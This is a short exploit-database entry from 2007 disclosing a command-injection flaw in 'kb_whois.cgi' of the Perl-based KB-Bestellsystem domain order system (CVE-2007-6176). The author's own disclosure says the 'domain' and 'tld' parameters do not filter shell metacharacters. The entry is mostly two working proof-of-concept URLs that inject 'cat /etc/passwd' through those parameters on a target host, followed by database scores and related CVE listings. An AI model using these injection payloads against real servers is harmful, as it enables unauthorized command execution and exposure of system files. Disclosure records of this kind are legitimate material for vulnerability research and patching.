Lucene search
Zero XEDB-ID:4647HistoryNov 22, 2007 - 12:00 a.m.
KB-Bestellsystem - 'kb_whois.cgi' Command Execution
2007-11-2200:00:00
Zero X
www.exploit-db.com
49
AI Score
7.4
Confidence
Low
"KB-Bestellsystem" is a domain order system written in Perl.
The "domain" and "tld" parameters in "kb_whois.cgi" are not filtering shell metacharacters.
The following examples will show you the /etc/passwd file:
http://targethost.com/kb-bestellsystem/kb_whois.cgi?action=check_owner&domain=;cat%20/etc/passwd;&tld=.com&tarrif=
http://targethost.com/kb-bestellsystem/kb_whois.cgi?action=check_owner&domain=google&tld=.com;cat /etc/passwd;&tarrif=
<< Greetz Zero X >>
# milw0rm.com [2007-11-22]Related
cvelist
cvelist
CVE-2007-6176
2007-11-30 00:00:00
prion
prion
Design/Logic Flaw
2007-11-30 00:46:00
nvd
nvd
CVE-2007-6176
2007-11-30 00:46:00
cve
cve
CVE-2007-6176
2007-11-30 00:46:00